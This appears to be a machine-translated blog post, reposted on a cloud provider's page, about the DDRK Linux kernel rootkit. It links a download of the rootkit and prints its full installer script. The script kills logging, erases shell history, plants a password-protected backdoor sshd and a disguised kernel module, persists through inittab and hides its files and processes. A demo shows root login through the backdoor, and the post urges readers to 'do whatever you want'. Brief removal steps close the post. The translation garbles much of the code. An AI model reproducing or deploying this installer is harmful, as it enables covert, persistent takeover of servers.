Linux rootkit-ddrk attacks get root permissions and clear methods

Source: Internet
Author: User
Tags egrep

DDRK is a kernel-level rootkit that combines the advantages of shv and adore-ng in Linux.

DDRK files:

Netstat # Replace netstat in the system, read the port from the ssh configuration file, and hide it

Rk. ko # kernel module to hide files and processes

Setup # rootkit Installation File

Tty # ava Tool

Bin. tgz

--- Ttymon

--- Sshd. tgz

---. Sh

--- Shdcf2 # sshd configuration file

--- Shhk

--- Shhk. pub

--- Shrs

--- Sshd # sshd main program

DDRK: http://www.sectop.com/soft/ddrk.tgz

Therefore, you only need to upload these files to the server and run them successfully to obtain the root permission of the server. Do whatever you want.

 

The setup content is as follows:

#! /Bin/bash

 

########## Define variables ##########

DEFPASS = 123456 // default password

DEFPORT = 43958 // default port

BASEDIR = 'pwd'

SSHDIR =/lib/libsh. so

HOMEDIR =/usr/lib/libsh

 

Unset HISTFILE; unset HISTSIZE; unset HISTORY; unset HISTSAVE; unset HISTFILESIZE

Export PATH = $ PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

 

########## Check is root ##########

If ["$ (whoami )"! = "Root"]; then

Echo "become root and try again"

Echo ""

Exit

Fi

 

########## Extract all tar ##########

Tar zxf bin. tgz

Cd bin

Tar zxf sshd. tgz

Rm-rf./sshd. tgz

Cd $ BASEDIR

Rm-rf bin. tgz

Cd $ BASEDIR

 

######### Kill syslogd ##########

Killall-9 syslogd>/dev/null 2> & 1

Sleep 2

 

########## Remove sh. conf ##########

If [-f/etc/sh. conf]; then

Rm-rf/etc/sh. conf // password file encrypted by md5sum

Fi

 

######### Initialize sshd configuration ##########

If test-n "$1"; then

Echo "Using Password: $1"

Cd $ BASEDIR/bin

Echo-n $1 | md5sum>/etc/sh. conf

Else

Echo "No Password Specified, using default-$ DEFPASS"

Echo-n $ DEFPASS | md5sum>/etc/sh. conf

Fi

 

 

Touch-acmr/bin/ls/etc/sh. conf

Chown-f root: root/etc/sh. conf

 

If test-n "$2"; then

Echo "Using ssh-port: $2"

Echo "Port $2" >>$ BASEDIR/bin/. sh/sshd_config

Cat $ BASEDIR/bin/. sh/shdcf2> $ BASEDIR/bin/. sh/sshd_config; rm-rf $ BASEDIR/bin/. sh/shdcf2

Mv $ BASEDIR/bin/. sh/sshd_config $ BASEDIR/bin/. sh/shdcf

Else

Echo "No ssh-port Specified, using default-$ DEFPORT"

Echo "Port $ DEFPORT"> $ BASEDIR/bin/. sh/sshd_config

Cat $ BASEDIR/bin/. sh/shdcf2> $ BASEDIR/bin/. sh/sshd_config; rm-rf $ BASEDIR/bin/. sh/shdcf2

Mv $ BASEDIR/bin/. sh/sshd_config $ BASEDIR/bin/. sh/shdcf

Fi

 

########### Creating dirs ##########

SSHDIR =/lib/libsh. so

HOMEDIR =/usr/lib/libsh

 

If [-d/lib/libsh. so]; then

Rm-rf/lib/libsh. so

Fi

 

If [-d/usr/lib/libsh]; then

Rm-rf/usr/lib/libsh /*

Fi

 

Mkdir $ SSHDIR

Touch-acmr/bin/ls $ SSHDIR

Mkdir $ HOMEDIR

Touch-acmr/bin/ls $ HOMEDIR

 

Cd $ BASEDIR/bin

Mv. sh/* $ SSHDIR/

Mv. sh/. bashrc $ HOMEDIR

 

If [-f/sbin/ttyload]; then

Chattr-AacdisSu/sbin/ttyload

Rm-rf/sbin/ttyload

Fi

 

If [-f/usr/sbin/ttyload]; then

Rm-rf/usr/sbin/ttyload

Fi

 

If [-f/sbin/ttymon]; then

Rm-rf/sbin/ttymon

Fi

 

Mv $ SSHDIR/sshd/sbin/ttyload

Chmod a + xr/sbin/ttyload

Chmod o-w/sbin/ttyload

Touch-acmr/bin/ls/sbin/ttyload

Kill-9 'pidof ttyload'>/dev/null 2> & 1

 

Mv $ BASEDIR/bin/ttymon/sbin/ttymon

Chmod a + xr/sbin/ttymon

Touch-acmr/bin/ls/sbin/ttymon

Kill-9 'pidof ttymon'>/dev/null 2> & 1

 

Cp/bin/bash $ SSHDIR

 

######### Modify inittab ##########

Cp/etc/inittab/etc/. inittab

Sed-e s @ ^ :2345 @ 0: 2345: once:/usr/sbin/ttyload & @/etc/inittab>/etc/. inittab

Touch-acmr/etc/inittab/etc/. inittab

Mv-f/etc/. inittab/etc/inittab

 

Echo "/sbin/ttyload-q>/dev/null 2> & 1">/usr/sbin/ttyload

Echo "/sbin/ttymon>/dev/null 2> & 1">/usr/sbin/ttyload

Echo "$ {HOMEDIR}/tty I 'pidof ttyload'>/dev/null 2> & 1">/usr/sbin/ttyload

Echo "$ {HOMEDIR}/tty I 'pidof ttymon'>/dev/null 2> & 1">/usr/sbin/ttyload

 

Touch-acmr/bin/ls/usr/sbin/ttyload

Chmod 755/usr/sbin/ttyload

/Usr/sbin/ttyload>/dev/null 2> & 1

 

Touch-amcr/bin/ls/etc/inittab

 

########## Make sure inittab has modified ##########

 

If [! "'Grep ttyload/etc/inittab '"]; then

Echo "# WARNING-sshd wont be reloaded upon restart"

Echo "# inittab shuffling probly fucked-up! "

Fi

 

########## Load rk. ko ##########

Cd $ BASEDIR

Modprobe-r ehci-hcd

Mv-f rk. ko/lib/modules/'uname-R'/kernel/drivers/usb/host/ehci-hcd.ko

Modprobe ehci-hcd

Mv tty $ HOMEDIR

 

########## Replace netstat ##########

Touch-acmr/bin/netstat

Mv-f netstat/bin/netstat

 

######### Hide all files and process ##########

$ HOMEDIR/tty h/etc/sh. conf>/dev/null 2> & 1

$ HOMEDIR/tty h/lib/libsh. so>/dev/null 2> & 1

$ HOMEDIR/tty h/usr/lib/libsh>/dev/null 2> & 1

$ HOMEDIR/tty h/sbin/ttyload>/dev/null 2> & 1

$ HOMEDIR/tty h/usr/sbin/ttyload>/dev/null 2> & 1

$ HOMEDIR/tty h/sbin/ttymon>/dev/null 2> & 1

$ HOMEDIR/tty I 'pidof ttyload'>/dev/null 2> & 1

$ HOMEDIR/tty I 'pidof ttymon'>/dev/null 2> & 1

 

######### Load rk. ko on boot ##########

Cat>/etc/sysconfig/modules/ehci. modules <EOF

#! /Bin/sh

# Install usb modules support

Modprobe-r ehci-hcd

Modprobe ehci-hcd

EOF

Touch-amcr/bin/ls/etc/sysconfig/modules/ehci. modules

 

Chmod 755/etc/sysconfig/modules/ehci. modules

$ HOMEDIR/tty h/etc/sysconfig/modules/ehci. modules>/dev/null 2> & 1

 

########## Check iptables setting ##########

If [-f/sbin/iptables]; then

Echo "'/sbin/iptables-l input | head-5 '"

Else

Echo ""

Echo "# lucky for u no iptables found"

Fi

 

######### Start syslogd ##########

/Sbin/syslogd-m 0
 


 

#./Setup 123 3333 // set the password to 123 and the port number to 3333

Usingpassword: 123

Usingssh-port: 3333

Chain INPUT (policy ACCEPT)

Target prot opt source destination

 

View hidden effects:

View Processes

# Ps-ef | egrep-I "ttyload | ttymon"

Root 24761 17990 0 00:00:00 pts/2 egrep-I ttyload | ttymon

 

View port

# Netstat-ntplu

Active Internet connections (only servers)

Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name

Tcp 0 0 127.0.0.1: 2208 0.0.0.0: * LISTEN 2117/hpiod

-Tcp 0 0 0.0.0.0: 3306 0.0.0.0: * LISTEN 2267/mysqld

Tcp 0 0 0.0.0.0: 43958 0.0.0.0: * LISTEN-

Tcp 0 0 127.0.0.1: 631 0.0.0.0: * LISTEN 2134/cupsd

Tcp 0 0 127.0.0.1: 25 0.0.0.0: * LISTEN 2295/sendmail: acce

Tcp 0 0 127.0.0.1: 2207 0.0.0.0: * LISTEN 2122/python

Udp 0 0 0.0.0.0: 32768 0.0.0.0: * 2417/avahi-daemon:

Udp 0 0 0.0.0.0: 68 0.0.0.0: * 19752/dhclient

Udp 0 0 0.0.0.0: 5353 0.0.0.0: * 2417/avahi-daemon:

Udp 0 0 0.0.0.0: 631 0.0.0.0: * 2134/cupsd

 

View the load Module

# Lsmod | grep-I ehci-hcd

 

View rootkit Related Files

# Ls-dl/lib/libsh. so/usr/lib/libsh/etc/sh. conf/sbin/ttyload/sbin/ttymon/bin/ttymon/usr/sbin/ttyload

Ls:/bin/ttymon: No such file or directory

-Rw-r -- 1 2618748389 4063569279 36 Nov 28 2006/etc/sh. conf

Drwxr-xr-x 2 2618748389 4063569279 4096 May 11/lib/libsh. so

-Rwxr-xr-x 1 2618748389 4063569279 212747 Nov 28 2006/sbin/ttyload

-Rwxrwxr-x 1 2618748389 4063569279 93476 Nov 28 2006/sbin/ttymon

Drwxr-xr-x 2 2618748389 4063569279 4096 May 11/usr/lib/libsh

-Rwxr-xr-x 1 2618748389 4063569279 171 Nov 28 2006/usr/sbin/ttyload

 

View the/etc/inittab File

# Run gettys in standard runlevels

0: 2345: once:/usr/sbin/ttyload

1: 2345: respawn:/sbin/mingetty tty1

2: 2345: respawn:/sbin/mingetty tty2

3: 2345: respawn:/sbin/mingetty tty3

4: 2345: respawn:/sbin/mingetty tty4

5: 2345: respawn:/sbin/mingetty tty5

6: 2345: respawn:/sbin/mingetty tty6

 

Verification:

The Host IP address that has been cracked and successfully executed is 192.168.27.129.

Log on to 192.168.27.129 from another server. Set the password to 123 and the port number to 3333.

[Root @ localhost ~] # Ssh 192.168.27.129-p 3333

A root@192.168.27.129s password:

Last login: Thu Nov 11 11:20:59 2010 from 192.168.27.1

[Sh] w. e. l. c. o. m. e

[Sh] To The DoDos Rootkit

[Root @ DoDo:/root] #

[Root @ DoDo:/root] # env

TERM = xterm

SHELL =/bin/bash

SSH_CLIENT = 192.168.27.13038824 3333

SSH_TTY =/dev/pts/3

USER = root

LS_COLORS = no = 00: fi = 00: di = 01; 34: ln = 01; 36: pi = 40; 33: so = 01; 35: bd = 40; 33; 01: cd = 40; 33; 01: or = 01; 05; 37; 41:

Mi = 01; 05; 37; 41: ex = 01; 32 :*. cmd = 01; 32 :*. exe = 01; 32 :*. com = 01; 32 :*. btm = 01; 32 :*. bat = 01; 32 :*. sh = 01; 32 :*.

Csh = 01; 32 :*. tar = 01; 31 :*. tgz = 01; 31 :*. arj = 01; 31 :*. taz = 01; 31 :*. lzh = 01; 31 :*. zip = 01; 31 :*. z = 01; 31 :*. Z = 01; 31:

*. Gz = 01; 31 :*. bz2 = 01; 31 :*. bz = 01; 31 :*. tz = 01; 31 :*. rpm = 01; 31 :*. cpio = 01; 31 :*. jpg = 01; 35 :*. gif = 01; 35 :*. bmp

= 01; 35: *. xbm = 01; 35: *. xpm = 01; 35: *. png = 01; 35: *. tif = 01; 35:

MAIL =/var/spool/mail/root

PATH =/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:/usr/local/sbin: /usr/lib/libs :.

PWD =/root

MACHINE = DoDo

PS1 = [33 [0; 36 m] [$ ID @ [33 [1; 37 m] $ MACHINE [33 [0 m] [33 [0; 36 m]: $ {PWD}] #[33 [0 m]

SHLVL = 1

HOME =/usr/lib/libsh

ID = root

LOGNAME = root

_ =/Bin/env

 

So far, you can fully control 192.168.27.129.

 

Go to 192.168.27.129 to view the logon User:

# W

13:40:55 up, 0 users, load average: 1.23, 0.93, 0.77

User tty from login @ IDLE JCPU PCPU WHAT

Only Local Users are allowed.

 

 

Clear method:

# Cd/usr/lib/libsh

# Modprobe-r ehci-hcd

#./Tty u/etc/sysconfig/modules/ehci. modules

Checking for adore 0.12 or higher...

Failed to authorize myself. No luck, no adore?

Adore NOT installed. Exiting.

# Rm-rf/etc/sysconfig/modules/ehci. modules

# Rm-rf/lib/modules/'uname-R'/kernel/drivers/usb/host/ehci-hcd.ko

#./Tty u/etc/sh. conf

Checking for adore 0.12 or higher...

Failed to authorize myself. No luck, no adore?

Adore NOT installed. Exiting.

#./Tty u/lib/libsh. so

Checking for adore 0.12 or higher...

Failed to authorize myself. No luck, no adore?

Adore NOT installed. Exiting.

#./Tty u/sbin/ttyload

Checking for adore 0.12 or higher...

Failed to authorize myself. No luck, no adore?

Adore NOT installed. Exiting.

#./Tty u/usr/sbin/ttyload

Checking for adore 0.12 or higher...

Failed to authorize myself. No luck, no adore?

Adore NOT installed. Exiting.

#./Tty u/sbin/ttymon

Checking for adore 0.12 or higher...

Failed to authorize myself. No luck, no adore?

Adore NOT installed. Exiting.

# Rm-rf/etc/sh. conf/lib/libsh. so/usr/lib/libsh/sbin/ttyload/usr/sbin/ttyload/sbin/ttymon

# Rm-rf/bin/netstat

# Vim/etc/inittab remove 0: 2345: once:/usr/sbin/ttyload

In fact, you should also check where the system vulnerabilities are located to eliminate future risks.

 

This article is from the blog "Yan que an Zhihong zhizai ".

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.